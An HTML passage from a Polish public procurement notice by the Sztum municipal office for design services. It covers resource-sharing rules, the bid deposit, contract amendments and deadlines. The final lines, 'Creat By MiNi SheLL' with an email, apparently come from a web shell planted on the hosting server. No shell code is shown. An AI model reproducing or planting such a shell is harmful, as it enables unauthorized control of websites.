wykazu osób stanowi załącznik nr 11 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Udostępnienie zasobów:<br/>1) Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby,niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>2) W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonują roboty budowlane, do realizacji, których te zdolności są wymagane.<br/>3) Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny<br/>podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>4) Zobowiązanie podmiotu udostępniającego zasoby (wzór zobowiązania stanowi załącznik nr 9 do SWZ), o których mowa w w/w ppkt 1)-3) potwierdza, że stosunek łączący Wykonawcę z<br/>podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>a) zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby,<br/>b) sposób i okres udostępniania Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,<br/>kwalifikacji zawodowych i doświadczenia, zrealizuje roboty, których wskazane zdolności dotyczą.<br/>5) Zamawiający oceni, czy udostępnione Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełnienia warunków udziału w postępowaniu, w przypadku niniejszego zamówienia tj. o których mowa w ust. 2 pkt 4 VII rozdziału SWZ.<br/>6) Zamawiający zgodnie z art. 119 ustawy PZP zbada, czy nie zachodzą wobec podmiotu udostępniającego zasoby podstawy wykluczenia o których mowa w niniejszym rozdziale, które to zostały przewidziane względem Wykonawcy.<br/>7) Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia o których mowa w pkt. 1 VII rozdziału SWZ, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że<br/>samodzielnie spełnia warunki udziału w postępowaniu.<br/>8) Wykonawca nie może po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w<br/>danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>9) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa wraz z ofertą oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw do wykluczenia tego podmiotu udostępniającego zasoby, oraz odpowiednio wypełnienie warunków udziału w postępowaniu, w zakresie w jakim Wykonawca powołuje się na jego zasoby – wzór oświadczenia stanowi załącznik nr 8 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda wniesienia wadium w wysokości 1.700,00 PLN brutto (słownie: jeden tysiąc siedemset złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą (z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy).<br/>3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości(Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Urzędu Miasta i Gminy Sztum nr konta: 19 8309 0000 0000 0042 2000 0040<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 ppkt 2–4, Wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6.	Wadium wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 3 ppkt 2–4, powinno być nieodwołalne i musi gwarantować Zamawiającemu bezwarunkową wypłatę na jego pierwsze pisemne żądanie kwoty wadium w przypadkach określonych w art. 98 ust. 6 ustawy, bez jakichkolwiek dodatkowych zastrzeżeń i warunków. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi być podpisana w taki sposób, by prawnie<br/>zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>2) Zgodnie z art. 58 ust. 1 ustawy PZP Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku zgodnie z art. 58 ust. 2 ustawy PZP Wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania ich i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>4) Wykonawcy wspólnie ubiegających się o udzielenie zamówienia, oświadczenie o którym mowa w pkt 1 lit. a) VIII rozdziału SWZ , składa każdy z Wykonawców – wzór oświadczenia nr 6 do SWZ.<br/>5) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art. 117 ust. 4 ustawy PZP Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają<br/>do oferty oświadczenie z którego wynika, które usługi wykonają poszczególni Wykonawcy – wzór oświadczenia stanowi załącznik nr 7 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 16<br/>1.	Zamawiający dopuszcza możliwość zmiany postanowień w zawartej umowie w stosunku do tre-ści oferty na podstawie, której dokonał wyboru Wykonawcy w zakresie dotyczącym:<br/>1.1.	zmiany terminu wykonania zamówienia – przedłużenie terminu wykonania zamówienia może nastąpić w przypadku, gdy wykonawca będzie miał opóźnienie w realizacji umowy z któregokolwiek z powodów wymienionych poniżej:<br/>a)	w przypadku dokonywania dodatkowych uzgodnień z właściwymi organami lub podmiotami, wykonywania obowiązków nałożonych przez te organy lub podmioty, oczekiwania na decyzje, postanowienia wydawane przez właściwe organy, o ile wykonawca należycie wykonuje obowiązki wynikające z umowy i polecenia właściwych instytucji, na czas usunięcia wyżej wymienionych przeszkód,<br/>b)	w przypadku zwiększenia/zmniejszenia zakresu przedmiotu umowy,<br/>c)	w przypadku wykonania uzupełniających analiz, opracowań,<br/>d)	w przypadku konieczności uzyskania dodatkowych uzgodnień terenowo-prawnych,<br/>e)	w przypadku konieczności zmiany trasy projektowanej infrastruktury z powodu braku możliwości lokalizacji sieci zgodnie z warunkami z powodów braku zgody właściciela te-renu lub wysokich roszczeń odszkodowawczych,<br/>f)	w przypadku zmiany w przepisach prawnych,<br/>g)	w przypadku nie dotrzymania przez Zamawiającego terminów, o których mowa §8 ust. 6 niniejszej umowy, o termin przekroczenia terminu, <br/>h)	w przypadku zmiany zakresu Przedmiotu Umowy stała się konieczna ze względu na inte-res Zamawiającego, w szczególności z uwagi na zmianę zakresu dokumentacji projekto-wej pierwotnie przeznaczonej do wykonania w ramach Przedmiotu Umowy,<br/>i)	w przypadku konieczności wprowadzenia znaczących zmian projektowych wymagają-cych aktualizacji dokumentacji,<br/>j)	w przypadku uzasadnionej zmiany zakresu projektu, w szczególności uwzględnienia uwarunkowań wpływających na użyteczność, koszty użytkowania lub bezpieczeństwo obiektu,<br/>1.2.	wysokości wynagrodzenia Wykonawcy z tytułu realizacji Umowy – w sytuacji, gdy konieczność wprowadzenia tych zmian spowodowana jest:<br/>a)	zmianą zakresu Przedmiotu Umowy wynikającą z konieczności uzyskania dodatkowych uzgodnień, opinii, analiz, opracowań niezbędnych do opracowania dokumentacji, do-datkowych prac związanych z np. uzyskaniem uzgodnień terenowo-prawnych,<br/>b)	zmianą w obowiązujących przepisach prawnych,<br/>c)	zmianą, o których mowa w ust. 1 pkt.1.1. lit. b, h, i, j niniejszego paragrafu poprzez zmniejszenie lub zwiększenie wynagrodzenia,<br/>d)	zmianą wysokości stawki podatku VAT,<br/>e)	w przypadku umowy powyżej 12 miesięcy – zmianą minimalnego wynagrodzenia za pra-cę ustalonego na podstawie art. 2 ust. 3-5 ustawy z dnia 10 października 2002r. o mini-malnym wynagrodzeniu (tj. Dz. U. z 2018r. poz. 2177) lub, zasad podlegania ubezpiecze-niom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne lub, jeżeli Wykonawca złoży pisemny wniosek w którym wykaże, bezpośredni wpływ tych zmian na koszty wykonania przedmiotu niniej-szej umowy, zarówno co do faktu jak i co do wysokości, przedstawiając na to wiarygodne dowody, <br/>	zmiana wynagrodzenia o której mowa w pkt. 1.2 lit. e niniejszego paragrafu na-stępuje, o ile zmiany przepisów prawa wskazane w pkt. 1.2 lit. e niniejszego pa-ragrafu spowodowały wzrost kosztów wykonania zamówienia o więcej niż 8 % w stosunku do kosztów poniesionych w miesiącu poprzedzającym tę zmianę. Zmiana wynagrodzenia dotyczy tylko tej części wynagrodzenia, która pozostała do zapłacenia przez Zamawiającego i nie może przekroczyć łącznie 5% wartości wynagrodzenia pozostałego do zapłacenia. <br/>	każda ze stron umowy, w terminie 30 dni od dnia wejścia w życie przepisów o których mowa w pkt. 1.2 lit. d, e, niniejszego paragrafu występuje do drugiej strony z uzasadnionym wnioskiem o zmianę wynagrodzenia. Wzrost kosztów usług wykonywanych przez podwykonawców będzie brany pod uwagę tylko w zakresie, w jakim zostały one zgłoszone Zamawiającemu. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-23 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/sztum</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-23 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie stawia wymogu zatrudnienia na umowę o pracę osób wykonujących czynności projektanta – samodzielna funkcja techniczna w budownictwie.<br/>2. Zamawiający:<br/>1) nie stawia wymagań w zakresie zatrudnienia osób, o których mowa w art. 96 ust. 2 pkt 2 ustawy PZP,<br/>2) nie przewiduje wizji lokalnej, o której mowa w art. 131 ust. 2 ustawy PZP,<br/>3)nie przewiduje rozliczeń w walutach obcych,<br/>4) nie przewiduje zwrotu kosztów udziału w postępowaniu, w tym zwrotu kosztów poniesionych z<br/>tytułu nabycia kwalifikowanego podpisu elektronicznego,<br/>5) nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych zadań,<br/>6) wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom<br/>oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców. W zakresie nie uregulowanym w niniejszym ogłoszeniu zastosowanie mają SWZ oraz ustawa PZP.<br/>3. W zakresie nieuregulowanym w niniejszym ogłoszeniu oraz SWZ, zastosowanie mają przepisy rozporządzenia Ministra Rozwoju,Pracy i Technologii z dnia 23 grudnia 2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz.U. z 2020r. poz. 2415) oraz rozporządzenie Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020r. poz. 2452).</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com